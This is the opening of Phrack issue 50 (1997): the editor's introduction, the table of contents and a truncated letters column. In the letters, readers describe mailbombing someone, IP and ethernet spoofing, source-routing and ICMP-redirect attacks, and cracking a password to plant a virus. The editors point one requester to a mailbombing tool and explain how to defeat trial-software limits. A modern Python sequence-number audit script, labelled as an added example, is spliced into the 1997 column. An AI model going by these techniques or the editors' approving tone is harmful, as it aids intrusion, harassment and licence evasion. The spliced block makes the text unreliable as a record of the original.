.oO Phrack 50 Oo.
Volume Seven, Issue Fifty
1 of 16
Issue 50 Index
____________________
P H R A C K 5 0
April 09, 1997
____________________
"The Perfect Drug"
START the fireworks...
ALERT the mass media...
CUE up the Axel-F Beverley Hills Cop music...
AND FOR THE LOVE OF GOD, SOMEONE NOTIFY MITCH KABAY...!
Phrack 50 is here.
To celebrate this landmark event, for a limited time, we are offering *all*
Phrack issues (including this one) at a special "WE-MUST-BE-OUT-OF-OUR-MINDS"
rate of HALF-PRICE!! That's right! Now you can enjoy Phrack for 50% off
the standard price of free! Now you can enjoy your favorite electronic
zine and still have enough money left over to get those breast implants!
It seems that, in recent months, the mass media has finally caught on to what we
have known all along: computer security _IS_ in fact important. Barely a
week goes by that a new vulnerability of some sort doesn't pop up on CNN.
But the one thing people still don't seem to fathom is that _WE_ are the
ones that care about security the most... We aren't the ones that the
corporations and governments should worry about... We are not the enemy.
Phrack is often described by the mass media as an 'Underground Hacker's Zine'
run by `irresponsible` youths. Compare Phrack's distribution with that of
the security publications that charge just enough money to keep students
and interested outsiders from reading it... Then decide who is
`irresponsible`. Phrack is often criticized by professionals as giving away
tools to people who aren't responsible enough to use them. The fact is, we
are giving away tools to people who aren't rich enough to buy them.
The parallels between Internet packet sniffing and phone wire tapping are
enormous. The abuses of wire tapping by government agencies are well
documented. Not so well documented, however, are similar abuses by these same
agencies across key Internet access points. This is just another classic
example of the Government trying to assert complete control. The Internet is,
however, anarchistic by nature and dynamic by design. It resists all attempts
at governing and all attempts at control.
By providing a public compendium of the same knowledge, information and
resources that all the money in the world can buy, we help ensure that the
Internet will remain safe with the individual. Knowledge is not power.
Knowledge is _empowerment_.
This issue contains a great deal of C source code. Somewhere in the
neighborhood of 5000 lines of C source. To facilitate painless extraction
of the code and support files into an arbitrarily designated hierarchical
directory structure and still maintaining readability while in `zine`
format, we developed a custom extraction utility. (Good lord that was a
long sentence...) Article 16 contains the source for extract.c; instructions
for compilation and use can be found therein.
---------------------------------------------------------------------------
Enjoy the magazine. It is for and by the hacking community. Period.
Editors : daemon9[route], Datastream Cowboy
Asst. Editor : Alhambra (appears courtesy of the guild corp.)
On ice : Voyager
Mailboy : Erik Bloodaxe
News : Alhambra, disorder
Elite : snocrash
Best Coast : Left Coast
Fatstar : loadammo
Thinstar : nirva
SPOOOOOOOOON! : sirsyko
Rocks the Fucking House : 16 Volt
Bad at pool : the NSA
Tip o' the black hat : omerta
Birthday Boy : loki
GET A LIFE : All you jennicam losers. (jennicam.simplenet.com)
Shout outs / Thank yous : mudge (cos he just plain rules), the Guild and
r00t, pyro, blaboo, o0, halflife, nihil (for
dealing with my daily whining, working 6848 hours
a week, and *still* providing the kickass article),
alhambra (for coming through in a big way for Phrack
when other people let us down), mycroft (fruitbat),
Juliet (cookies)
Phrack Magazine V. 7, #50, April 09, 1997.
Contents Copyright (c) 1996/7 Phrack Magazine. All Rights Reserved. Nothing
may be reproduced in whole or in part without written permission from the
editors. Phrack Magazine is made available quarterly to the public, free of
charge. Go nuts people.
Subscription requests, articles, comments, whatever should be directed to:
phrackedit@infonexus.com
Submissions to the above email address may be encrypted with the following
key (note this is a REALLY NEW key, we promise not to lose it this time):
ENCRYPTED SUBSCRIPTION REQUESTS WILL BE IGNORED
Phrack goes out plaintext... You certainly can subscribe in plaintext
-------------------------------------
Table Of Contents
1. Introduction ... Phrack Staff 9K
2. Phrack Loopback ... Phrack Staff 60K
3. Line Noise ... various 72K
4. Phrack Prophile on Aleph1 ... Phrack Staff 7K
5. Linux TTY hijacking ... halflife 15K
6. Juggernaut ... route 123K
7. SNMP insecurities ... Alhambra 20K
8. Cracking NT Passwords ... Nihil 17K
9. SS7 Diverter plans ... Mastermind 27K
10. Skytel Paging and Voicemail ... pbxPhreak 36K
11. Hardwire Interfacing under Linux ... Professor 11K
12. PC Application Level Security ... Sideshow Bob 21K
13. DTMF signalling and decoding ... Mr. Blue 17K
14. DCO Operating System ... mrnobody 16K
15. Phrack World News ... Alhambra 110K
16. extract.c ... Phrack Staff 2K
523k
-------------------------------------
Every article in Phrack is written free of charge, for and by the hacking
community. If you are a hack, phreak, student, professor, professional,
or even a loser with an idea and you have some knowledge or information
you would like to impart, there are thousands of readers who would love
nothing more than to learn from you. If you want to submit something
anonymously, it will stay anonymous; if you want attribution, feel free to
use your real name or a pseudonym. The deadline for submissions to Phrack 51 is
July 25th, 1997, but the earlier the better. If you are planning on writing an
article we'd like to hear from you as soon as possible.
If you don't think you are going to be able to write an article, but you have
some comments about Phrack, commentary about the hacking world, funny stories,
exploits, news items, or just want to tell us about the government site you
just hacked (PGP'd and through an anonymous remailer PLEASE), we love getting
mail. PGP key and e-mail address are above.
-------------------------------------
" *pyro* phrack is my faith and the e-zine is my bible, you are one of my
high priests! "
- Some IRC zealot
" ...r00t and the guild.... Like peanut-butter and jelly -- you could have
one without the other, but *why* would you want to...? "
- route
EOF
.oO Phrack 50 Oo.
Volume Seven, Issue Fifty
2 of 16
Phrack Loopback
-----------------------------------------------------------------------------
Hi,
I have a story of violations of freespeech and censorship and
if I am busted unjustly, please publish this story to the public.
Yesterday some faggot e-mailed me with a ton of ascii crap that
took me an hour + to DL. When I finished DLing it, windoze stalled and I
had to restart.. So naturally I was pissed off. The reason this guy
said he did this was because I posted a cheat program for the game
Diablo on my webpage and he doesn't like cheaters. Today he e-mailed me
again with ascii crap.....I was beyond pissed....so I did what anyone in
my position would do....I mailbombed him ... about 600 msg's or so.
I used Kaboom3 and an SMTP I thought (Looked like it from port 25) was
anonymous and untraceable.
As it turns out, 2 hours later the head of security at Earthlink
(my current ISP) called and said that someone from my account had e-mail
bombed this person. The security guy said that the person I bombed
complained to his ISP because it "put out his business for hours." His
ISP traced it to Earthlink and then to me, by contacting the earthlink
security guy and having him look in the logs for who was connected to
the ip (dynamic) they saw in the bomb messages at the time the bombing
occurred. He also said that the guy I bombed called the FBI and got them
involved in it. Is this sounding fucking ridiculous yet? First of all,
any reputable business presumably has a better-than-28.8 connection,
which means it would have taken this guy a couple seconds to DL my bomb.
Secondly, even if he doesn't have a T-1, at 28.8 it would take 2 hours
or so, maybe less. But the FBI is involved..... I can't fucking
believe it! So naturally the first thing I do is e-mail all the
reputable hackz known to me. This is ridiculous, this is
oppressive, this is BIG BROTHER!
Yours,
GrEeNbEaSt
[ So, what exactly is it that you want us to do, besides burst into fits
of uncontrollable for several minutes at a time? ]
-----------------------------------------------------------------------------
Hey, in phrack 48, the article on IP spoofing says you need to sample the
TCP sequence numbers of the host you are attacking. The method it
suggests is to connect via SMTP and then drop the connection. There is
a problem with this - sendmail usually logs failed mail transfers, so
the host will probably be able to correlate this with the time of the
attack and find out who you are. Further, this connection must be done
from a non-spoofed IP address to guarantee you get a returned packet.
There are two options available here:
1) Forge the sequence sampling connection as another host on your subnet
(although if they contact your provider and your provider logs massive
data, you're busted - also this will not work if the local network uses
an active hub)
2) Make sure to remove these traces if you manage to crack the machine -
this is all or nothing - if you fail to crack it, but left indicators of
an attack, you are screwed. (again only if your provider logs heavily)
If you want to circumvent these dangers altogether, simply sample the
sequence numbers from some highly non-logging port. The standard inetd
server for UNIX runs a TCP echo, discard and chargen service, which you
can get sequence numbers from, and does not log anything.
There are two complications to this attack which are becoming
increasingly used, and which effectively prevent it.
1) Some providers do not allow foreign IP addresses to go out of their
subnet as source IP addresses - this is done through router blocking.
Most sites just don't give a damn or are too stupid to figure out how to
do it, but the number of providers doing this is increasing. You could
try to hack their router - easy to find, do a traceroute, but chances of
success are slim if it doesn't allow remote logins. Also, your ISP will
know if this happens, and may take additional precautions immediately
(such as grabbing your ethernet address if you are on a local network -
then you are f!!ked) We don't want any minors reading this to see any
offensive words, do we - oh lord, they might even ban phrack in the
state of Texas. No offense to anyone from Tx unless they deserve it.
2) Some OS's use pseudo-random number generators to create TCP sequence
numbers at the beginning of each connection. This is easy to do under
Linux, and I think some commercial OS's might even be doing this now
(anyone have confirmation of the rumor that Solaris now does this?)
Now, this is easy to check for - connect twice in immediate succession
and see if you get two sequential (or close) numbers. However, a
workaround for this would be to generate pseudo-random sequence numbers
for the first connection from a given IP address (and then again when
the IP layer no longer has any knowledge of this IP address) If a site
was running non-crypto pseudo-random sequences, it would be possible to
analyze it using a spectral test to try to predict sequence numbers, but
if they use a cryptographically secure sequence generator, you would
have to break it (probably not too hard since any highly secure crypto
sequence would make IP response time unreasonably slow) A
counter-solution to this would be to generate random numbers in low cpu
load time, and have a buffer of them for later use. Here, we could
probably go on forever with attacks and countermeasures, so let's stop
now, as a cure for sanity.
As an aside note for the highly paranoid: ethernet spoofing
Note: some of this is theorized, and might not be 100% accurate - if you
get the gist of it, you should be able to figure out if it works for
you.
It is possible to spoof ethernet hardware addresses as well. Some cards
will allow you to do this easily, but you need to have card programming
docs (check the Linux kernel source for your card driver-!!). Others
won't let you do it at all, and require a ROM change, or worse it might
be solid state logic on the card - EVIL. Course you might be able to
get around solid state stuff by recoding the ROM, but I wouldn't
recommend it unless you don't have the $70 to buy a new card, and have a
month or two to spend in the basement.
If you make up an ethernet address, you should probably use a real card
identifier (the first three bytes). This is because some sniffing
software raises warning flags when unknown card identifiers pop up, and
this software is run by more network admins than I'd like to think.
Some new hub technologies may limit this type of spoofing- most notably,
active hubs wouldn't allow it at all. Other new hub designs use
mappings of ethernet address to specific ports on the hub, so you might
not be able to change the address without turning off the machine,
waiting for the hub to time out the address, and rebooting.
Ethernet hardware address spoofing will make a machine completely
undetectable, provided it is not the only machine on a network that is
being monitored.
There may be a way around active hubs, and this is multicast ethernet
addresses. Any network card capable of multicast should be able to send
packets with an ethernet multicast address. This address is not
specific to each card, as many cards can send and receive on the same
multicast address. The problem here is router and hub technology may
have already advanced to the point where it can distinguish multicast
ethernet addresses and convert them to multicast IP addresses, which
would not allow you to spoof. This is only theoretical - I haven't
tried it, don't know anyone who has, and have never even heard rumors
about it.
Note : this information is in no means comprehensive - I don't have the
time or resources to study it, but most likely results in ethernet
spoofing vary by the manufacturers of the network hardware all the way
down the local line - (i.e - ethernet card all the way to the first
gateway)
Another aside: return path rerouting
In return path rerouting, the IP spoofing attack follows the same
general principle, except that the attacking machine gets reply packets,
and does not need to operate blind. There are three ways to make this
work:
1) Pretending to be a trusted host on your subnet
Easy, just pick up packets destined for the trusted machine which
look like responses to your forged packets, and send on their IP
address, and SYN flood their machine. This will even work past
blocking ISP's
2) Source routing attack
Medium difficulty, you have to construct a path between your machine
and the target, and a path between your machine and the trusted host
(although the last part can be made up). Use this and either the
strict or loose IP routing option, and all packets will come back to
you. This will not work nearly as much, since many hosts and
routers discard source routed packets (it is a well-known flaw in
TCP/IP now). However, mightn't buggy implementations only discard
one type of source routing?
3) Experimental - ICMP redirect attack
Try using ICMP redirects to redirect the packets back to the
attacking machine. ICMP redirects should only be accepted to
machines on a local subnet, but buggy implementations might not do
this correctly (actually, I think the Host Requirements RFC says
this is recommended, not required). Also, it may be possible to
create a path using redirects or forged routing updates to direct
traffic to a trusted site back to the attacking site. After the
attack, the routing information could be repaired, making it seem
like a temporary network failure. If anyone followed this and knows
what I mean, let me know if you think it's possible.
Thanks
Zach
[ Zach, you have good ideas and points. Now, why haven't YOU written
an article for Phrack???
You should... ]
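Zach's second complication suggests a quick check for predictable sequence numbers: connect twice in immediate succession and see whether the two ISNs are sequential or close. The following is an added example, not part of the letter or the editors' reply, that generalises that check to a list of ISNs an administrator has sampled back to back from their own host, so the host can be audited before anyone relies on address-based trust to it. The ISN lists in the block are constructed for illustration, not captured from any real system.

```python
"""Audit sampled TCP initial sequence numbers (ISNs) for predictability.

Added example (not from the Phrack letter). It generalises the letter's
two-connection test to any list of ISNs sampled back to back from one host.
All sample ISNs below are constructed for illustration.
"""
import math

ISN_MODULUS = 1 << 32  # sequence numbers are 32-bit and wrap around


def isn_deltas(isns):
    """Successive differences between sampled ISNs, taken modulo 2^32 so a
    generator that wraps past 0xFFFFFFFF still yields its true increment."""
    return [(later - earlier) % ISN_MODULUS
            for earlier, later in zip(isns, isns[1:])]


def delta_spread_bits(deltas):
    """Rough bits of uncertainty left in the next ISN, from the delta spread.

    The spread (largest delta minus smallest) is the window an observer who
    sampled the generator a moment ago would still have to search. Its log2
    is how many bits of the 32-bit value remain unknown; 0 means the next
    ISN is fully determined by the previous one.
    """
    spread = max(deltas) - min(deltas)
    return 0.0 if spread == 0 else math.log2(spread)


def classify_isn_generator(isns, close_threshold=1 << 12):
    """Classify a host's ISN generator from back-to-back samples.

    'constant'   every delta is identical: the next ISN is last + delta.
                 This is the case the letter's two-connection test catches.
    'small-step' deltas vary, but by less than close_threshold, so a fresh
                 sample still narrows the next ISN to a small window.
    'random'     deltas are spread widely over the 32-bit space, which is
                 what a per-connection random generator looks like.
    A time-based generator sampled quickly will show up as 'small-step';
    sample over a longer interval as well before trusting a verdict.
    """
    if len(isns) < 3:
        raise ValueError("need at least three samples to judge a generator")
    deltas = isn_deltas(isns)
    if len(set(deltas)) == 1:
        return "constant"
    if max(deltas) - min(deltas) < close_threshold:
        return "small-step"
    return "random"


def audit_report(isns):
    """Summarise one host's samples as a dict suitable for logging."""
    deltas = isn_deltas(isns)
    return {
        "samples": len(isns),
        "verdict": classify_isn_generator(isns),
        "deltas": deltas,
        "uncertainty_bits": round(delta_spread_bits(deltas), 2),
    }


# Constructed samples (not real captures):
# a classic fixed increment of 64000 per connection,
CONSTANT_SAMPLE = [1000, 65000, 129000, 193000]
# a slowly advancing generator caught wrapping past 2^32,
WRAPPING_SAMPLE = [4294967000, 200, 1400, 2500]
# and values spread over the whole space, as a random generator gives.
RANDOM_SAMPLE = [0x1F3A9C21, 0x9B04E77E, 0x0C6D21A0, 0xE3B7F0F5, 0x5A22C8C3]


if __name__ == "__main__":
    for name, sample in (("constant", CONSTANT_SAMPLE),
                         ("wrapping", WRAPPING_SAMPLE),
                         ("random", RANDOM_SAMPLE)):
        print(name, audit_report(sample))
```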
-----------------------------------------------------------------------------
DEATH TO THE INNOCENT
I WENT TO A PARTY, MOM, I REMEMBERED WHAT YOU SAID.
YOU TOLD ME NOT TO DRINK, MOM, SO I DRANK SODA INSTEAD.
I REALLY FELT PROUD INSIDE, MOM, THE WAY YOU SAID I WOULD.
I DIDN'T DRINK AND DRIVE, MOM, THOUGH THE OTHERS SAID I SHOULD.
I KNOW I DID THE RIGHT THING, MOM, I KNOW YOU'RE ALWAYS RIGHT.
NOW THE PARTY IS ENDING, MOM, AS EVERYONE IS DRIVING OUT OF SIGHT.
AS I GOT INTO MY CAR, MOM, I KNEW I'D GET HOME IN ONE PIECE.
BECAUSE OF THE WAY YOU RAISED ME, SO RESPONSIBLE AND SWEET.
I STARTED DRIVING AWAY, MOM, BUT AS I PULLED INTO THE ROAD,
THE OTHER CAR DIDN'T SEE ME, MOM, AND HIT ME LIKE A LOAD.
AS I LAY HERE ON THE PAVEMENT, MOM, I HEAR THE POLICE MAN SAY,
THE OTHER GUY IS DRUNK, MOM, AND NOW I'M THE ONE WHO WILL PAY.
I'M LYING HERE DYING. MOM, I WISH YOU'D GET HERE SOON.
HOW COULD THIS HAPPEN TO ME, MOM? MY LIFE JUST BURST LIKE A BALLOON.
THERE IS BLOOD ALL AROUND ME, MOM, AND MOST OF IT IS MINE.
I HEAR THE MEDIC SAY, MOM, I'LL DIE IN A SHORT TIME.
I JUST WANTED TO TELL YOU, MOM, I SWEAR I DIDN'T DRINK.
IT WAS THE OTHERS, MOM. THE OTHERS DID NOT THINK.
HE WAS PROBABLY AT THE SAME PARTY AS I.
THE ONLY DIFFERENCE IS, HE DRANK AND I WILL DIE.
WHY DO PEOPLE DRINK, MOM? IT CAN RUIN YOUR WHOLE LIFE.
I'M FEELING SHARP PAINS NOW. PAINS JUST LIKE A KNIFE.
THE GUY WHO HIT ME IS WALKING, MOM, AND I DON'T THINK IT'S FAIR.
I'M LYING HERE DYING AND ALL HE CAN DO IS STARE.
TELL MY BROTHER NOT TO CRY MOM, TELL DADDY TO BE BRAVE.
AND WHEN I GO TO HEAVEN, MOM, PUT DADDY'S GIRL ON MY GRAVE.
SOMEONE SHOULD HAVE TOLD HIM, MOM, NOT TO DRINK AND DRIVE.
IF ONLY THEY HAD TOLD HIM, MOM, I WOULD STILL BE ALIVE.
MY BREATH IS GETTING SHORTER, MOM. I'M BECOMING VERY SCARED.
PLEASE DON'T CRY FOR ME, MOM, WHEN I NEEDED YOU, YOU WERE ALWAYS THERE.
I HAVE ONE LAST QUESTION, MOM, BEFORE I SAY GOODBYE.
I DIDN'T DRINK AND DRIVE, MOM, SO WHY AM I THE ONE TO DIE?
[ Interesting...booze, violence. Now, if only this little story had
some forced sodomy of teenage schoolgirls...
Man, I have no shame...drinking and driving is evil, and will get you
shot in Central America for attempted homicide. That's why I take
cabs or hang around with 12-steppers or mormons. Either way, it gives
you someone to subject to your drunken ravings.
Now why this was sent to Phrack, I have no idea. ]
-----------------------------------------------------------------------------
I just have one question. I just moved back down to Texas from NY.
Is there anyone at Phrack that knows local BBS numbers for San Antonio?
Thanks for the help,
[In almost any city with running water and electricity (and yes,
even San Antonio qualifies as of this writing), in any local computer
store you will find local compu-nerd publications. I think in San Antonio
it's "Computer User." In any case, in the back are usually listings of
local bulletin boards. Start with these, and eventually you will come
across the kinds of bulletin boards you really want. ]
-----------------------------------------------------------------------------
The trial of the Danes arrested in the article I wrote in #47 has now
ended. No jail sentences, just community service up to 200 hours (me)
and a fine of 30,000 DKr (approx. $5000).
Anyway, remember I wrote you about the article being quoted and
translated to Danish in a Danish magazine? Well, after the same magazine
published our REAL names and addresses with the advice not to hire us for any
jobs, I got pretty sick of them and sent them a bill of DKr 5000, billing
them for my article.
Of course, they won't pay me (would rather go to court) so now I'm
considering taking them on their word. The company I'd be going after
is a daughter company of Coopers & Lybrand and is called Institute of
Datasecurity. Most of their employees seem to be notorious idiots, always
proclaiming themselves in the media with the anecdotes of yesterday. They
even gave out an award (money) to the DA who prosecuted us for doing
a nice job!
Well, since they didn't only violate my personal copyright but also the
restrictions of Phrack Magazine itself, I wanted to know if I could get
your support? Just some kind of written statement about the policy of
the magazine, whether or not they paid you for it, etc.
In a hurry, don't mind the mistakes,
Le Cerveau
[ Can you please send a photocopy of that article to us at the Phrack
mailing address? Maybe we can help.
I really don't have much respect for the accounting firms "computer
security" teams, and never have. In the years they've been doing this
work, they STILL don't get it.
It's too bad you aren't in America. You could probably sue the living hell
out of everyone involved, if they really did publish your names
and advise people not to hire you for work. ]
-----------------------------------------------------------------------------
HEY Whats up,
I was wondering if U could tell me how to e-mail bomb Please!!!!
[No, that's a stupid thing to do.
But, if you insist....
Go do a WWW search for the program "UpYours" This should
suit your needs just fine. ]
-----------------------------------------------------------------------------
Hello,
I was wondering if you know where I can get copies of "The Journal of
Privileged Information"? I have issues 1-5, and I'm looking for 6 -
present. If you know where I can get them, it would be greatly
appreciated!! thanx
techcode
[ I'm not really familiar with this magazine, but if anyone out there
has copies of this, email us with information on where to get more. ]
-----------------------------------------------------------------------------
Dear Phrack,
Great job on issue 49. I enjoyed the section in Line Noise about ID
machine hacking. Anyway, I wanted to say that Phrack rules; it is by
far my favorite computer hobbyist magazine. By the way, I remember reading a
letter that a reader sent in, about some queer selling bound volumes of Phrack,
LOD Tech Journals, and virus source code. A similar occurrence happened to
me when I found that some wannabe-elite pseudo-hacker was selling printed
copies of Phrack, 40 Hex, Digital Free Press, and Xeroxed copies of alt.2600.
I was curious, to say the least, and felt compelled to defend the honor of
those aforementioned publications. I talked to the fag, and I gained his
trust by using undecipherable hacker jargon that he seemed awed by. It turns
out that he had been distributing pirated junk on his PC, using an unregistered
copy of Serv-U. I gave him a registration crack, and in return he gave me an
account on his machine, so I could download his warez. I logged on to
his PC one day, and I quickly found the serv-u.ini file with the encrypted
passwords.
Since Serv-U uses Unix style encryption, I cracked his personal account
in about 17 minutes. He kept a TCP/IP connection open from 4pm to 11pm
every evening, and I logged on as him one day. I uploaded a virus to the
windows system directory and renamed it something benign, and then I edited
his autoexec.bat to execute it (I also used Fixtime from the Nowhere
Utilities 2.0 to make it smooth). I haven't heard from him since. That
one was a simple job to protect the rights of cool magazines like Phrack!
Take it easy, and keep the issues coming.
dethbug
[ If only all readers were as loyal. Or better yet, if only all readers
sent us a dollar!
Seriously though...a virus was a bit much, but since we weren't there
to sue to protect our copyright...
But uh, let it be known that you were not directed by, nor acting as an
agent of Phrack Magazine, and any and all such behavior was done
purely on your own behalf. :) ]
-----------------------------------------------------------------------------
Does this cost anything ?
LORDCYBRON
[ Unfortunately it does, but only your mortal soul. ]
-----------------------------------------------------------------------------
Phrack,
We would like permission to republish Chris Goggans'
(Erik Bloodaxe) editorials from issue 4.42 to issue
7.48 in Node9: An E-Journal of Writing and Technology.
http://node9.phil3.uni-freiburg.de
There is a lot of interest in hacker culture in
cultural studies, and Chris Goggans' editorials give
a good snapshot of the hacker's side from the
last three years.
We could tell our readers to simply go to Phrack and get
the editorials themselves, but putting the editorials
together makes them more effective. Plus, for many of
our readers, a number of names, terms, events need to
be annotated.
Jon Adams
[ Well Jon, Phrack has always had a policy of letting people reprint
articles / editorials / whatever as long as all pieces remain
intact with all credit given to the original author and to Phrack
Magazine. If you can do that, feel free to use the editorials. ]
-----------------------------------------------------------------------------
Hi Hackers
==========
I have only one question for you, please answer me. I read in your magazine
> ==Phrack Magazine==
>
> Volume Seven, Issue Forty-Eight, File 10 of 18
>
> Electronic Telephone Cards: How to make your own!
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
It's very excellent for people who live in a country where the cards from
Gemplus, Solaic, Schlumberger, Oberthur (French cards, 256 bit) are used. But I live
in the Slovak Republic, and in this country we use the cards from ODS, Giesecke &
Devrient, ORGA Kartensysteme, Uniqua, Gemplus, Schlumberger and Oldenbourg
Kartensysteme (German cards, 128 bit).
I was reading in some paper that some people have an emulator of these
telephone cards (German card), an emulator with a PIC processor.
But I have been searching the Internet for a very very long time and I have no information on how
I make this emulator. Only in your magazine I found help on how I make an
emulator, but an emulator which emulates the French telephone card, and I need an
emulator which emulates the German telephone card.
Please help me if you know some address where I can find information
HOW I MAKE A TELEPHONE CARD EMULATOR (WITH PIC PROCESSOR) WHICH EMULATES A
TELEPHONE CARD OF TYPE GERMAN TELEPHONE CARD (128 BITS).
Thanks very much, for your answer. realllly thanks, i am waiiiiting.
!!!!! M A X O !!!!!
[ Actually, we don't but perhaps this request will bring in some
information from people in Germany. ]
-----------------------------------------------------------------------------
Can you please send me some hacker stuff that I can use on AOL.
THANX
[ The most important tool a hacker can have is a brain. Unfortunately,
since you are on AOL, it appears that your tool box is empty. Perhaps
you'd be more interested in some cool beavis & butthead .WAV files... ]
-----------------------------------------------------------------------------
Looking for talented hackers for special projects.
First project concerns breaking source code. Please respond.
Justin Raprager
[ You probably can't afford any of us on the Phrack Staff.
Your request is being passed on the the readers. ]
-----------------------------------------------------------------------------
Is your web site the best kept secret on the Internet?
We'll promote it to 50 search engines and indexes for $85
and complete the job in 2 business days. Satisfaction is
guaranteed!
Owl's Eye Productions, Inc.
260 E. Main Street
Brewster, NY 10509
Phone: (914) 278-4933
Fax: (914) 278-4507
Email: owl@owlsnest.com
[ Now, if our site is a secret, then how did you morons know about us?
I think a better sales pitch is:
"Is your Web Site Secure?"
We'll give your info to several million hackers for FREE who will be
sure to subject it to an extensive battery of security testing ranging
from exploitation of remote security vulnerabilities to denial of service
attacks. Your site will be profiled continuously for months until
people grow tired of causing you grief.
Would Owl's Eye Productions, Inc. care to be the first for this
amazing new service? Let us know. ]
-----------------------------------------------------------------------------
From: Ray Wardell
To: phrack@well.com
Subject: FUCK YOU
FUCK YOU ... YOU DUMB ASS SHIT HEAD... FUCK WITH ME AND DIE...
[ Uh, ok. ]
-----------------------------------------------------------------------------
Hi, I would like to become a hacker. I just watched that movie HACKERS. It
got me all psyched up. If you could give me some information on how to
become one, I would be appreciative.
[ So if you had watched "Buttman Goes To Budapest" then Stagliano would
be getting this email instead of Phrack?
Dude...it was only a movie. And a bad one at that. ]
-----------------------------------------------------------------------------
Hi there !
Your article of the PIC16C84-Phonecard includes a uuencoded part
that contains the file "telecard.zip". telecard.zip contains the file
telecard.pcb which was created with Tango PCB Series 2.
My version of Accel Tango PCB Version 12 is not able to read this file.
So, I want to ask you if it's possible to send me this file in ASCII format
or (better) in a graphic-format like PCX or GIF.
A HP-Laserjet-prn-viewer would be useful, too.
I was also not able to read the schematic-file. Maybe you know a
location on the internet where I can get an evaluation version of the
older version of Tango PCB Series II.
[ Actually, we've got the same problem here at Phrack. Anyone out there
who can help, please send us email and we'll get it out to the
masses! ]
-----------------------------------------------------------------------------
Hi my name is Konrad. I live in Ottawa, Ontario (Canada). I have a
question about one thing. When I download a trial program from the internet,
it is only good for 30 days, and when it expires it writes that to some
file, so I tried reinstalling and redownloading the program, but when I
tried to run it, it gave me a message that this version is expired and
that I have to purchase the program. Do you know to what file it
registers that it has expired, and how to disable it? If you don't know
how to do it, maybe you know someone that might be able to do it, and
forward my address to them. It is very important to me, because I'm
finishing a home page called Teen Online and my graphic program expired
(TrueSpace2) and there is no way that I can afford it, so I'd rather stick
to the trial version. Ok... Thanks for your time.
Konrad
[ Usually you can simply reinstall these trial programs and use them
for another 30 days. With others, you can change your system date
back, or edit a date in an INI file. It all depends on the program.
Try some of these things and let us know what works. ]
-----------------------------------------------------------------------------
Why don't you write something for the Bulgarian hackers?
(recent: take a look at everything that happened in Varna, Bulgaria this year)
M a n i a X K i l l e r i a n
[ We'd love to print something about the Bulgarian scene. Honestly,
I have no idea what happened in Varna, nor would I know where to look.
Here's a novel idea: Since you are IN Bulgaria, why don't you
write something about it for us! ]
-----------------------------------------------------------------------------
I'm using BPI Accounts Receivable System Version 1.10 for IBM,
released September 1983.
It has what's called a "key disk" that allows only the person with that
disk to close out the program or month. The problem is this: when I make
a copy of this Key Disk the files match the original to the T. There are
only 2 files involved. But, when I try to close out, BPI asks me to insert
the Key Disk and press enter to proceed. When I do this with the "copy"
of the Key Disk the BPI program tells me that the copy is not a Key Disk.
This only happens with the copy; any ideas?
Both Key Disks contain the same information. If I try to activate the
close directly from the Key Disk Copy it tells me that it can't find a
file, basrun.exe. I checked and this file is part of the BPI Directory on C:.
I've used this accounting software for many years and it works well.
But I'm afraid the good Key Disk may go bad one day and I'll be stuck.
That's why I'm trying to make a copy. Any help would be appreciated.
[ Obviously there is something else on that disk that a normal copy
is not getting. Maybe something as simple as a volume label or
some hidden files.
The easiest thing to do to get around this is make a sector by sector copy
to a disk image file using some kind of program like the UNIX command "dd"
and then copy that image back onto a blank diskette. ]
-----------------------------------------------------------------------------
Hi!
Here I have something for you, which may be interesting in your news
section.
Sometime during the night between Saturday April 5th and Sunday April 6th,
hackers broke into one of Telenor Nextel's webservers and deleted the
homepages of 11.000 private customers and 70 corporate customers, among them
the homepages of Norway's two largest newspapers VG and Dagbladet, and the
largest online news magazine, Nettavisen.
The hackers somehow got access to hidden scripts, and after modifying and
manipulating them ran them, thereby deleting all the files mentioned.
Early Sunday, the ISP Telenor Nextel started restoring files from a backup
made Saturday, but after encountering problems with that one, they had to
restore from Tuesday's backup. Saturday's backup will be added sometime
during Monday.
Økokrim, Norwegian police's department for Economic Crime has been
contacted.
Reactions:
Sverre Holm of Norway's Organization for Internet Users (http://www.ibio.no)
criticize Telenor for lack of proper information, as well as an unhealthy
attitude. In response to Telenor's comment that they can't guarantee this won't
happen again, he says, "Such an attitude can't be tolerated. If this is what
Telenor means, then we have a serious problem here."
Other reactions will surely come in the next days.
References (all in Norwegian):
Telenor Internett:
http://internett.telenor.no/
Scandinavia Online:
http://www.sol.no/ (Telenor's online service)
SOL Direkte:
http://www.sol.no/snpub/SNDirekte/index.cgi?kategori=3DNett-Nytt
Nettavisen:
http://www.nettavisen.no/Innenriks/860330846.html
I hope this could be interesting to you, and a candidate for your news flash
pages. Unfortunately, any references included are to pages in Norwegian, but
anyone with you speaking either Norwegian, Swedish, or Danish should be able
to get more information.
Cheers,
O L I K
[ We here at Phrack always want to know what is going on out there on
planet Earth. Keep us informed of any other developments! ]
-----------------------------------------------------------------------------
I'm investigating some informatic viruses which infect images generating
new fractalized images with a never seen beauty and singularity. Or maybe
they investigate me. These viruses could broke sohemer in many diverse
disciplines like art, artificial life, fractal maths, digital image..
if you look at the web's images http://antaviana.com/virus/angles.htm you will
understand everything. I would be grateful if you could help me, and
if it is possible I would like you to diffuse this subject in your interesting
publication.
In the name of biodiversity, if you have these VIRUSES,
PLEASE DON'T DESTROY THEM.
[ Ok. We won't. ]
-----------------------------------------------------------------------------
Hi !
I read In Volume Seven, Issue Forty-Eight, File 11 of 18 - How to make own
telephone card. But when I try to make it, this card didn't work! I try
all things, and I try to find more information about telephone cards, but
I still don't know what's wrong!
But today I found on http://www.hut.fi/~then/electronics/smartcards.html
that there are some errors, but there is no information what's wrong.
So I decided to write to Phrack magazine, because in the article it is written to
mail all questions to Phrack....
Please send me info what is wrong, and how I must change the ASM program to
work correctly or just PLEASE send me email of contact person who knows how
to !!
Thanx in advance !
Marko
[ Obviously that little smartcard article caused a stir. We've got all kinds
of email about it. We'll see what more we can dig up, but we are going
to really need some help from Europeans and South Americans. (Smart
cards are not in use here in America!) ]
-----------------------------------------------------------------------------
LOA is back!!! Visit our new page at:
http://www.hackers.com/LOA
Check it out and be sure to send your comments to revelation@hackers.com
Volume 2 of The Ultimate Beginner's Guide To Hacking And Phreaking has been
released as well, so be sure to download it and send me your comments. Be
sure to check out the LOA Files section to view and download past, present,
and future LOA Projects. Take it easy all...
[ No offense intended, but did you ever wonder why there were so many
"Legions of" whatever after LOD?
We'll put a link up to your page though... ]
-----------------------------------------------------------------------------
Hey, did you know that Juno (the nationwide free email service) has PPP
